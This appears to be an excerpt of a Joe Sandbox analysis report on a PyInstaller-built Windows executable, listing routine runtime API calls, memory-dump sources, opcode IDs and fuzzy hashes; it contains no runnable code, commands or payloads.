                                                                                                                                                                                                                                                        • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                                                                                        • API String ID: 6828938-1529539262
                                                                                                                                                                                                                                                        • Opcode ID: 5ed7a9ba3e6ce910408607b93085540bd422a8d0f9e00f9f84049ca226c14b37
                                                                                                                                                                                                                                                        • Instruction ID: e9d8dab3fe82b62e0af5a68f00cf7bda707a0707b00caa4a4a15cef69107325d
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5ed7a9ba3e6ce910408607b93085540bd422a8d0f9e00f9f84049ca226c14b37
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E9211E61A0C74281EE14AB10E7152EA72A5FFA4780F8C5435FA4DE3B9ADF7CD9458740

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF65E29CF4B), ref: 00007FF65E29D07C
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF65E29CF4B), ref: 00007FF65E29D107
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 953036326-0
                                                                                                                                                                                                                                                        • Opcode ID: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                                                                                                                                                                                                                        • Instruction ID: 6bdec473a1115a50d68ea61b8e6f73ab385847abfd400c03a9e46faf91eeb7b7
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9D91B472E1865185FF609F6597402BD3BA0BB64B88F5C6139EE0EF7699CE38D482D700
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1279662727-0
                                                                                                                                                                                                                                                        • Opcode ID: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
                                                                                                                                                                                                                                                        • Instruction ID: abfcec0c1eccae45def0ec14e285701159a39fc1a6af7c93d519b1c65f2ca903
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 74418322E5878183EB508B2197503797360FFA47A4F14A339FA9C93AD9DF7CA5E08710
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3251591375-0
                                                                                                                                                                                                                                                        • Opcode ID: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                                                                                                                                                                                                                        • Instruction ID: 8f88573af3c10fcc84ea9442cc27f9188a21e52087fdf66bad6a8a81d67caf13
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2A310721E4C24641FE64AB659B623B93681AF71784F4C5034FA0EF72DFDE6DA844C202
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
• Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1703294689-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
• Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
• Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2976181284-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • RtlFreeHeap.NTDLL(?,?,?,00007FF65E2A2D22,?,?,?,00007FF65E2A2D5F,?,?,00000000,00007FF65E2A3225,?,?,?,00007FF65E2A3157), ref: 00007FF65E29A95E
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF65E2A2D22,?,?,?,00007FF65E2A2D5F,?,?,00000000,00007FF65E2A3225,?,?,?,00007FF65E2A3157), ref: 00007FF65E29A968
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
• Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 485612231-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • CloseHandle.KERNELBASE(?,?,?,00007FF65E29A9D5,?,?,00000000,00007FF65E29AA8A), ref: 00007FF65E29ABC6
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF65E29A9D5,?,?,00000000,00007FF65E29AA8A), ref: 00007FF65E29ABD0
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
• Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 918212764-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
• Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _fread_nolock
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 840049012-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3947729631-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
• Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(?,?,?,00007FF65E290C90,?,?,?,00007FF65E2922FA,?,?,?,?,?,00007FF65E293AE9), ref: 00007FF65E29D63A
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AllocHeap
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 4292702814-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3140674995-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF65E2A5C45
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF65E2A5598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF65E2A55AC
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF65E29A948: RtlFreeHeap.NTDLL(?,?,?,00007FF65E2A2D22,?,?,?,00007FF65E2A2D5F,?,?,00000000,00007FF65E2A3225,?,?,?,00007FF65E2A3157), ref: 00007FF65E29A95E
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF65E29A948: GetLastError.KERNEL32(?,?,?,00007FF65E2A2D22,?,?,?,00007FF65E2A2D5F,?,?,00000000,00007FF65E2A3225,?,?,?,00007FF65E2A3157), ref: 00007FF65E29A968
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF65E29A900: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF65E29A8DF,?,?,?,?,?,00007FF65E29A7CA), ref: 00007FF65E29A909
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF65E29A900: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF65E29A8DF,?,?,?,?,?,00007FF65E29A7CA), ref: 00007FF65E29A92E
                                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF65E2A5C34
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF65E2A55F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF65E2A560C
                                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF65E2A5EAA
                                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF65E2A5EBB
                                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF65E2A5ECC
                                                                                                                                                                                                                                                        • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF65E2A610C), ref: 00007FF65E2A5EF3
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 4070488512-0
                                                                                                                                                                                                                                                        • Opcode ID: c8e181fbda5929fcc8f6a75e148055e791a7ddaa32984997676ab034941af52a
                                                                                                                                                                                                                                                        • Instruction ID: 4f281034176911df3013f987ee8b4250cc6c8bb6dd160c89aabe629e5470f518
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c8e181fbda5929fcc8f6a75e148055e791a7ddaa32984997676ab034941af52a
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7FD1A162A8864286EF24AF21DB411BA77A1FF64784F488039FA4DE769DDF7CE4418740
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1239891234-0
                                                                                                                                                                                                                                                        • Opcode ID: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                                                                                                                                                                                        • Instruction ID: bfb0a482f15c2cca432239415db995466ff1d2953f692fbc3e109f01d8b97bb7
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7A316F36A08B8186DF60CF25EA402AE77A5FB98754F580136FA9D93B58DF7CC145CB00
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2227656907-0
                                                                                                                                                                                                                                                        • Opcode ID: ee5daded1920a45b930385d49f4c9fb7106de6f00b6358014c2482279c1420ad
                                                                                                                                                                                                                                                        • Instruction ID: cb339db5556bb6227c5282cbd2160c5834d84b55c4179c21492ceda88941e2a8
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ee5daded1920a45b930385d49f4c9fb7106de6f00b6358014c2482279c1420ad
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 59B194A2B5879241EE619B2297001B97391FB64BF4F885131FA5EA7BDDEE7CE441C300
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF65E2A5EAA
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF65E2A55F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF65E2A560C
                                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF65E2A5EBB
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF65E2A5598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF65E2A55AC
                                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF65E2A5ECC
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF65E2A55C8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF65E2A55DC
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF65E29A948: RtlFreeHeap.NTDLL(?,?,?,00007FF65E2A2D22,?,?,?,00007FF65E2A2D5F,?,?,00000000,00007FF65E2A3225,?,?,?,00007FF65E2A3157), ref: 00007FF65E29A95E
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF65E29A948: GetLastError.KERNEL32(?,?,?,00007FF65E2A2D22,?,?,?,00007FF65E2A2D5F,?,?,00000000,00007FF65E2A3225,?,?,?,00007FF65E2A3157), ref: 00007FF65E29A968
                                                                                                                                                                                                                                                        • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF65E2A610C), ref: 00007FF65E2A5EF3
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3458911817-0
                                                                                                                                                                                                                                                        • Opcode ID: 6f2171165b001c2744b9d494c76d2a7753c36df5ed5d67f3075860c83c0dbe14
                                                                                                                                                                                                                                                        • Instruction ID: 76b4522d837cf2a77bd86c2dea338a05d10ad2e364f6f8f573d8f5af9e49c08b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6f2171165b001c2744b9d494c76d2a7753c36df5ed5d67f3075860c83c0dbe14
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0E518F32F4864296EF10EF21DB811AA7761BF68784F48853AFA4DE3699DF7CE4418740
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF65E2864CF,?,00007FF65E28336E), ref: 00007FF65E285840
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF65E2864CF,?,00007FF65E28336E), ref: 00007FF65E285852
